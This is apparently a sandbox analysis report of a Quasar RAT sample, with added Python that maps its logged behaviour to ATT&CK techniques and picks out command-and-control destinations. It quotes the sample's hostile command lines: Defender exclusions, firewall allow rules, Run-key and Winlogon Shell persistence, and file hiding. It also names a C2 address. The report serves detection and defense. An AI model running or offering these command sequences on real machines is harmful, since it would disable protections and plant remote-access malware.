Analysis Overview
SHA256
18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e
Threat Level: Known bad
The file 18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Unexpected DNS network traffic destination
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Looks up external IP address via web service
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 09:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 09:56
Reported
2023-08-01 09:59
Platform
win10v2004-20230703-en
Max time kernel
45s
Max time network
157s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ratt.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7z.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e.exe | "C:\Users\Admin\AppData\Local\Temp\18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" " |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com |
| C:\Windows\SysWOW64\nslookup.exe | nslookup myip.opendns.com. resolver1.opendns.com |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic ComputerSystem get Domain |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"' |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"' |
| C:\Users\Admin\AppData\Local\Temp\7z.exe | 7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1 |
| C:\Windows\SysWOW64\netsh.exe | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes |
| C:\Windows\SysWOW64\netsh.exe | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic computersystem where name="GBSDSUCH" set AutomaticManagedPagefile=False |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000 |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe | "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" |
| C:\Windows\SysWOW64\attrib.exe | "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F |
| C:\Users\Admin\AppData\Local\Temp\ratt.exe | "ratt.exe" |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 9 |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 10 |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 9 |
| C:\Windows\SysWOW64\cmd.exe | "cmd" /c ping 127.0.0.1 -n 8 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 8 > nul && "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 8 |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe," |
| C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 8 |
| C:\Users\Admin\Music\rot.exe | "C:\Users\Admin\Music\rot.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" |
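The signature list and the command lines above describe the sample's whole chain: Defender exclusions for the drop paths, inbound and outbound firewall allow rules for the Startup-folder copy, a Run key plus a Winlogon Shell value that chains rot.exe after explorer.exe, ping-to-loopback delays between steps, attrib +h on the dropped binary, and external IP and domain discovery. The Python below is an added example, not output of the sandbox or part of the report: it runs a small regex rule set over the command lines copied verbatim from the Processes table and maps each hit to an ATT&CK technique. The regexes and the technique IDs are my own mapping (the page names only "Enterprise Matrix V15" and gives no IDs), and autostart_targets pulls out the executables the REG ADD commands register so they can go straight into a hunt.

```python
"""Rule-based ATT&CK mapping for the command lines recorded in this report.
The command lines are copied from the Processes section; the regex rules and
the technique IDs are this example's own assumption, not sandbox output."""
import re
from collections import Counter

REPORT_COMMAND_LINES = r"""
"C:\Users\Admin\AppData\Local\Temp\18b80cdc4d6508f75bfed524cc6c8e39670339b424be0161484342a31912ec7e.exe"
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
wmic ComputerSystem get Domain
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
"C:\Windows\system32\cmd.exe"
wmic computersystem where name="GBSDSUCH" set AutomaticManagedPagefile=False
"C:\Windows\system32\cmd.exe"
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
"ratt.exe"
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
ping 127.0.0.1 -n 9
"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
ping 127.0.0.1 -n 10
"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
ping 127.0.0.1 -n 9
"cmd" /c ping 127.0.0.1 -n 8 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 8 > nul && "C:\Users\Admin\Music\rot.exe"
ping 127.0.0.1 -n 8
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
ping 127.0.0.1 -n 8
"C:\Users\Admin\Music\rot.exe"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
""".strip().splitlines()

# (technique id, short name, regex). The mapping is this example's assumption.
RULES = [
    ("T1562.001", "Defender exclusion added via Add-MpPreference",
     r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\b"),
    ("T1562.004", "firewall allow rule added via netsh advfirewall",
     r"netsh(?:\.exe)?\"?\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b"),
    ("T1547.001", "HKLM/HKCU Run key written with reg.exe",
     r"REG\s+ADD\s+\"?HK(?:LM|CU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b"),
    ("T1547.004", "Winlogon Shell value chained with an extra executable",
     r"CurrentVersion\\Winlogon\"?.*?/v\s+\"?Shell\"?.*?/d\s+\"?explorer\.exe,[^\"]+"),
    ("T1497.003", "ping-to-loopback sleep chained into the next command",
     r"ping\s+127\.0\.0\.1\s+-n\s+\d+\s*>\s*nul\s*&&"),
    ("T1564.001", "dropped file hidden with attrib +h",
     r"attrib(?:\.exe)?\"?\s+\+h\b"),
    ("T1016", "external IP discovery through the OpenDNS myip trick",
     r"nslookup\s+myip\.opendns\.com"),
    ("T1082", "domain membership discovery through wmic",
     r"wmic\s+ComputerSystem\s+get\s+Domain\b"),
]
COMPILED = [(tid, name, re.compile(pat, re.IGNORECASE)) for tid, name, pat in RULES]


def analyze(command_lines):
    """One finding per (rule, command line) pair whose regex matches."""
    findings = []
    for cmd in command_lines:
        for tid, name, rx in COMPILED:
            if rx.search(cmd):
                findings.append({"technique": tid, "name": name, "command": cmd})
    return findings


def technique_counts(findings):
    """How many command lines hit each technique id."""
    return dict(Counter(f["technique"] for f in findings))


def autostart_targets(command_lines):
    """Executables registered by the REG ADD persistence writes (Run key and
    Winlogon Shell); explorer.exe itself is dropped from the Shell value."""
    targets = set()
    for cmd in command_lines:
        m = re.search(r"REG\s+ADD\s+\"?HK(?:LM|CU)\\[^\"]+\"?.*?/d\s+\"([^\"]+)\"", cmd, re.I)
        if not m:
            continue
        for part in m.group(1).split(","):
            part = part.strip()
            if part and part.lower() != "explorer.exe":
                targets.add(part)
    return sorted(targets)
```

The rules deliberately key on the chained form of each step (for example ping followed by `&&`, or a Shell value that still starts with explorer.exe) rather than on the bare utilities, so an ordinary `ping` or `attrib` invocation does not fire; on a real endpoint the same rules would run over command-line fields from process-creation telemetry.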
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.135.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.141.123.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | | tcp |
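Most rows in the Network table are noise: PTR lookups that nslookup issues for every address it touches, and the three queries to 208.67.222.222 are the `nslookup myip.opendns.com. resolver1.opendns.com` trick that returns the victim's public address. The only connection with no preceding DNS resolution and a non-web port is 94.131.105.161:12344, which is the destination worth treating as command and control. The Python below is an added example, not part of the report, that applies that triage to the rows copied from the table; the 8.8.8.8 default-resolver assumption and the "no domain plus non-web port" heuristic for C2 candidates are mine.

```python
"""Triage the Network table of this report: separate resolver noise and
external-IP lookups from direct-to-IP connections (the C2 candidates)."""

# Rows copied from the Network table above: (country, destination, domain, proto).
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "67.31.126.40.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "59.128.231.4.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "95.221.229.192.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "resolver1.opendns.com", "udp"),
    ("US", "208.67.222.222:53", "resolver1.opendns.com", "udp"),
    ("US", "208.67.222.222:53", "resolver1.opendns.com", "udp"),
    ("US", "208.67.222.222:53", "resolver1.opendns.com", "udp"),
    ("US", "8.8.8.8:53", "9.228.82.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "222.222.67.208.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "198.1.85.104.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "26.165.165.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "171.39.242.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "126.135.241.8.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "88.156.103.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "233.141.123.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "161.252.72.23.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "ip-api.com", "udp"),
    ("US", "208.95.112.1:80", "ip-api.com", "tcp"),
    ("US", "8.8.8.8:53", "2.173.189.20.in-addr.arpa", "udp"),
    ("NL", "94.131.105.161:12344", "", "tcp"),
    ("US", "8.8.8.8:53", "1.112.95.208.in-addr.arpa", "udp"),
    ("NL", "94.131.105.161:12344", "", "tcp"),
]

# Assumption: the sandbox forwards ordinary DNS to 8.8.8.8; anything else is the sample's choice.
DEFAULT_RESOLVER = "8.8.8.8"
# Hosts contacted only to learn the victim's public address (per the nslookup and ip-api rows).
EXTERNAL_IP_SERVICES = {"ip-api.com", "myip.opendns.com", "resolver1.opendns.com"}
WEB_PORTS = {80, 443}


def triage(rows, default_resolver=DEFAULT_RESOLVER):
    """Bucket every row into noise, recon, or a C2 candidate."""
    out = {"reverse_lookups": [], "external_ip_lookups": set(),
           "foreign_resolvers": set(), "direct_ip_connections": []}
    for _country, dest, domain, proto in rows:
        host, port = dest.rsplit(":", 1)
        port = int(port)
        if proto == "udp" and port == 53:
            if domain.endswith(".in-addr.arpa"):
                out["reverse_lookups"].append(domain)      # PTR noise from nslookup
                continue
            if host != default_resolver:
                out["foreign_resolvers"].add(host)         # query steered past the normal resolver
        if domain in EXTERNAL_IP_SERVICES:
            out["external_ip_lookups"].add(domain)
        elif not domain and port not in WEB_PORTS:
            out["direct_ip_connections"].append(dest)      # no DNS, odd port: C2 candidate
    return out


def c2_candidates(rows):
    """Unique direct-to-IP destinations in first-seen order."""
    return list(dict.fromkeys(triage(rows)["direct_ip_connections"]))
```

The reverse lookups include the PTR records for 208.67.222.222 and 208.95.112.1 themselves, which is why they are bucketed before the external-IP check; a rule that flagged every query mentioning those addresses would double-count the recon step.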
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
| MD5 | 7ea1fec84d76294d9256ae3dca7676b2 |
| SHA1 | 1e335451d1cbb6951bc77bf75430f4d983491342 |
| SHA256 | 9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940 |
| SHA512 | ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317 |
memory/4728-146-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4728-147-0x00000000029B0000-0x00000000029C0000-memory.dmp
memory/4728-148-0x0000000002970000-0x00000000029A6000-memory.dmp
memory/4728-149-0x0000000005050000-0x0000000005678000-memory.dmp
memory/4728-150-0x0000000004F80000-0x0000000004FA2000-memory.dmp
memory/4728-151-0x0000000005870000-0x00000000058D6000-memory.dmp
memory/4728-152-0x0000000005950000-0x00000000059B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gezymuba.rpu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4728-162-0x0000000005F50000-0x0000000005F6E000-memory.dmp
